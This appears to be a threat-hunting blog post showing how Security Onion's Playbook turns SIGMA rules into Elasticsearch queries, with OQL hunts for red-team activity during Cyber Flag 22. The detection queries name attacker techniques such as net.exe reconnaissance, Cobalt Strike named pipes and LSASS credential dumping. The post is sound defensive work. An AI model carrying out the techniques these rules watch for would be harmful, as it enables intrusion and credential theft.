Hunting with Security Onion Playbook

[Screenshot: Playbook alert hit counts]

Summary

The ability to use SIGMA with Elasticsearch is one of the most powerful features that ships with Security Onion to date. "Playbook" is a Docker container hosted on the Security Onion Manager that converts SIGMA rules into Elasticsearch queries. Once a rule has been converted, the analyst can activate the resulting "Play", which is then run against the host logs ingested into the SIEM to flag anomalies. How an alert is generated depends entirely on the structure of the SIGMA rule behind the Play. Luckily, Security Onion now ships with over 1600 SIGMA rules, which is extremely useful for tracking down malicious activity in enterprise environments. However, to eliminate false positives, analysts will need to tune the SIGMA rules and sift out known-good processes that trigger alerts for otherwise suspect activity.

Cyber Flag 22 recently offered a great venue to test just how powerful SIGMA rules can be when used with the Security Onion Playbook feature. After activating over 1600 host-based detection rules, tuning false positives, and analyzing the hits in the "Dashboards", I was able to hunt more efficiently and effectively. Above you can see just how many hits I received over an 11-day period. LOTS! Below I have pasted screenshots and the "Hunt" OQL (Onion Query Language) queries to showcase just how quickly I was able to groupby, exclude, include, and analyze actual Red Team activity. Enjoy!

Example of Playbook SIGMA rule

Play #1223

Tuning SIGMA rules is rather simple. Analysts can manipulate the detection fields to create selection categories for more specific alerts and to sift out false positives based on endpoint activity.

SIGMA Converted Rule

Once analysts have tuned the SIGMA rule to their specification, they can convert it by submitting the changes, which generates a new "Elastic Query" as seen below.

query: (event.code.security:"1" AND winlog.channel.security:"Microsoft\-Windows\-Sysmon\/Operational" AND (process.executable.security:(*\\net.exe OR *\\net1.exe) OR process.pe.original_file_name.security:("net.exe" OR "net1.exe")) AND process.command_line.security:(*\ group* OR *\ localgroup* OR *\ user* OR *\ view* OR *\ share* OR *\ accounts* OR *\ stop\ * OR *\ start*))
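To make the conversion concrete, here is an added illustration (not Playbook's or sigmac's own code) of how the SIGMA selections behind this Play map onto the Lucene query string above. The rule dictionary is reconstructed from that query rather than copied from the Play #1223 YAML, and the `suffix` argument imitates the `.security` field names Security Onion uses.

```python
import re

# Constructed SIGMA-style rule reconstructed from the converted query shown above
# (not the Play #1223 YAML itself). SIGMA semantics: a list of maps is an OR of
# maps, a map is an AND of its fields, a list of values under one field is an OR.
NET_EXE_RULE = {
    "logsource": {"event.code": "1",
                  "winlog.channel": "Microsoft-Windows-Sysmon/Operational"},
    "detection": {
        "selection": [
            {"process.executable|endswith": ["\\net.exe", "\\net1.exe"]},
            {"process.pe.original_file_name": ["net.exe", "net1.exe"]},
        ],
        "cmdline": {"process.command_line|contains": [
            " group", " localgroup", " user", " view",
            " share", " accounts", " stop ", " start"]},
        "condition": "selection and cmdline",
    },
}

# Characters Lucene query-string syntax treats specially (space included); the page's query shows them as \-, \/, \\ and "\ ".
_LUCENE_SPECIAL = re.compile(r'([+\-=&|><!(){}\[\]^"~*?:\\/ ])')

def lucene_escape(value):
    return _LUCENE_SPECIAL.sub(r"\\\1", str(value))

def value_term(value, modifier):
    v = lucene_escape(value)
    if modifier == "endswith":
        return "*" + v
    if modifier == "startswith":
        return v + "*"
    if modifier == "contains":
        return "*" + v + "*"
    return '"' + v + '"'          # no modifier: exact, quoted match

def field_clause(key, values, suffix):
    field, _, modifier = key.partition("|")
    values = values if isinstance(values, list) else [values]
    terms = [value_term(v, modifier) for v in values]
    return f"{field}{suffix}:" + (terms[0] if len(terms) == 1 else "(" + " OR ".join(terms) + ")")

def selection_clause(sel, suffix):
    if isinstance(sel, list):
        return "(" + " OR ".join(selection_clause(s, suffix) for s in sel) + ")"
    parts = [field_clause(k, v, suffix) for k, v in sel.items()]
    return parts[0] if len(parts) == 1 else "(" + " AND ".join(parts) + ")"

def sigma_to_lucene(rule, suffix=""):
    """Only 'a and b' conditions are handled; suffix imitates Security Onion's '.security' fields."""
    det = rule["detection"]
    clauses = [field_clause(k, v, suffix) for k, v in rule["logsource"].items()]
    clauses += [selection_clause(det[n.strip()], suffix) for n in det["condition"].split(" and ")]
    return "(" + " AND ".join(clauses) + ")"
```

Calling `sigma_to_lucene(NET_EXE_RULE, suffix=".security")` reproduces the query string Playbook shows for this Play, which is a quick way to check what a tuned `contains` or `endswith` value will turn into before submitting it.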

Results

Net.exe Execution

event.dataset: alert AND event.module: "playbook" AND rule.name: "Net.exe Execution" AND NOT event_data.process.parent.executable: "C:\\Program Files\\Puppet Labs\\Puppet\\sys\\ruby\\bin\\ruby.exe" AND NOT event_data.process.parent.command_line: "C:/Windows/system32/net.exe stop mcollective" AND NOT event_data.process.parent.command_line: "C:/Windows/system32/net.exe start mcollective" | groupby rule.name "event_data.agent.name" "event_data.user.name" "event_data.process.pid" "event_data.process.executable" "event_data.process.parent.executable" "event_data.process.parent.command_line"

[Screenshots of the grouped Hunt results]
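As an added example (not Security Onion code), the following parses the subset of OQL used in these hunts, applies the include/exclude terms to a handful of constructed alert records, and builds the groupby table. It shows how the Puppet exclusions in the query above collapse the mcollective service restarts and leave only the hands-on use of net.exe; the flattened record field names and the sample alerts are assumptions, and the same parser applies to the PID exclusions used later on this page.

```python
import re
from collections import Counter

# Hunt query from this page (Net.exe Execution with its Puppet/mcollective exclusions),
# shortened to three groupby columns.
NET_HUNT = (
    'event.dataset: alert AND event.module: "playbook" AND rule.name: "Net.exe Execution"'
    r' AND NOT event_data.process.parent.executable: "C:\\Program Files\\Puppet Labs\\Puppet\\sys\\ruby\\bin\\ruby.exe"'
    r' AND NOT event_data.process.parent.command_line: "C:/Windows/system32/net.exe stop mcollective"'
    r' AND NOT event_data.process.parent.command_line: "C:/Windows/system32/net.exe start mcollective"'
    ' | groupby rule.name "event_data.agent.name" "event_data.process.parent.command_line"'
)
_CLAUSE = re.compile(r'^(NOT\s+)?([\w.]+):\s*"?(.*?)"?$')   # field: value  /  NOT field: "value"

def parse_oql(query):
    """Split an OQL hunt into include/exclude term sets and groupby fields (page subset only)."""
    head, *pipes = [p.strip() for p in query.split("|")]
    include, exclude = {}, {}
    for clause in re.split(r"\s+AND\s+", head):
        neg, field, value = _CLAUSE.match(clause.strip()).groups()
        value = value.replace("\\\\", "\\")      # OQL doubles backslashes inside quotes
        (exclude if neg else include).setdefault(field, set()).add(value)
    groupby = []
    for pipe in pipes:
        if pipe.startswith("groupby"):
            groupby = [a or b for a, b in re.findall(r'"([^"]+)"|(\S+)', pipe[7:])]
    return include, exclude, groupby

def hunt(records, query):
    """Return the groupby table (tuple of column values -> count) the Hunt UI would show."""
    include, exclude, groupby = parse_oql(query)
    hits = [r for r in records
            if all(r.get(f) in v for f, v in include.items())
            and not any(r.get(f) in v for f, v in exclude.items())]
    return Counter(tuple(r.get(f) for f in groupby) for r in hits)

def alert(agent, parent_exe, parent_cmd):
    """Constructed Playbook alert record, using the flattened field names seen in the Hunt UI."""
    return {"event.dataset": "alert", "event.module": "playbook", "rule.name": "Net.exe Execution",
            "event_data.agent.name": agent, "event_data.process.parent.executable": parent_exe,
            "event_data.process.parent.command_line": parent_cmd}

PUPPET = r"C:\Program Files\Puppet Labs\Puppet\sys\ruby\bin\ruby.exe"
SAMPLE_ALERTS = [   # constructed: three Puppet agent service restarts and one interactive use of net.exe
    alert("web01", PUPPET, "C:/Windows/system32/net.exe stop mcollective"),
    alert("web01", PUPPET, "C:/Windows/system32/net.exe start mcollective"),
    alert("db01", PUPPET, "C:/Windows/system32/net.exe stop mcollective"),
    alert("fs02", r"C:\Windows\System32\cmd.exe", "cmd.exe /c net localgroup administrators"),
]
```

Running `hunt(SAMPLE_ALERTS, NET_HUNT)` leaves a single row for fs02, while the same query without its NOT clauses returns all four alerts, which is the before/after the screenshots illustrate.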

Suspicious Remote Thread Created

event.dataset: alert AND event.module: "playbook" AND rule.name: "Suspicious Remote Thread Created" AND NOT event_data.winlog.event_data.SourceImage: "C:\\Windows\\Explorer.EXE" AND NOT event_data.agent.hostname: "airbase-mail" | groupby rule.name "event_data.agent.hostname" "event_data.winlog.event_data.SourceProcessId" "event_data.winlog.event_data.SourceImage" "event_data.winlog.event_data.TargetImage" "event_data.winlog.event_data.TargetUser"

[Screenshots of the grouped Hunt results]

Cobalt Strike Named Pipe

event.dataset: alert AND event.module: "playbook" AND rule.name: "CobaltStrike Named Pipe" | groupby rule.name "event_data.agent.name" "event_data.user.name" "event_data.process.pid" "event_data.process.executable" "event_data.winlog.event_data.PipeName"

[Screenshots of the grouped Hunt results]

Suspicious In-Memory Module Execution

event.dataset: alert AND event.module: "playbook" AND rule.name: "Suspicious In-Memory Module Execution" AND NOT event_data.winlog.event_data.SourceImage: "C:\\Windows\\Explorer.EXE" AND NOT event_data.agent.hostname: "airbase-mail" | groupby rule.name "event_data.agent.hostname" "event_data.winlog.event_data.SourceProcessId" "event_data.winlog.event_data.SourceImage" "event_data.winlog.event_data.TargetImage" "event_data.winlog.event_data.TargetUser"

Common PIDs on hosts: good or bad?

[Screenshot of the grouped Hunt results]

Common PIDs on a different host: good or bad? Different processes…

[Screenshot of the grouped Hunt results]

After excluding the same false-positive PID, we have a more focused result.

[Screenshots of the Hunt results after the PID exclusion]

Query Registry

event.dataset: alert AND event.module: "playbook" AND rule.name: "Query Registry" | groupby rule.name "event_data.agent.hostname" "event_data.process.executable" "event_data.process.parent.command_line"

WMI Event Subscription

event.dataset: alert AND event.module: "playbook" AND rule.name: "WMI Event Subscription" | groupby rule.name "event_data.agent.hostname" "event_data.winlog.event_data.EventNamespace" "event_data.winlog.event_data.Query"

Credentials Dumping Tools Accessing LSASS Memory

event.dataset: alert AND event.module: "playbook" AND rule.name: "Credentials Dumping Tools Accessing LSASS Memory" | groupby event.module | groupby rule.name "event_data.agent.hostname" "event_data.winlog.event_data.SourceProcessId" "event_data.winlog.event_data.SourceImage" "event_data.winlog.event_data.TargetImage"

Active Directory Replication from Non-Machine Account

event.dataset: alert AND event.module: "playbook" AND rule.name: "Active Directory Replication from Non Machine Account" | groupby rule.name "event_data.agent.name" "event_data.event.code" "event_data.user.name" "event_data.winlog.event_data.OperationType" "event_data.message"

CobaltStrike Service Installations in Registry

event.dataset: alert AND event.module: "playbook" AND rule.name: "CobaltStrike Service Installations in Registry" | groupby rule.name "event_data.agent.hostname" "event_data.process.pid" "event_data.process.executable" "event_data.winlog.event_data.TargetObject" "event_data.winlog.event_data.Details"

Example from Base-IT8 (the captured Details value was an obfuscated PowerShell one-liner launched via %COMSPEC%)

Reg Add RUN Key

event.dataset: alert AND event.module: "playbook" AND rule.name: "Reg Add RUN Key" | groupby rule.name "event_data.host.name" "event_data.process.ppid" "event_data.process.parent.command_line"

Kerberos over Non-Standard Port


DNS Hunting

11 Day Capture
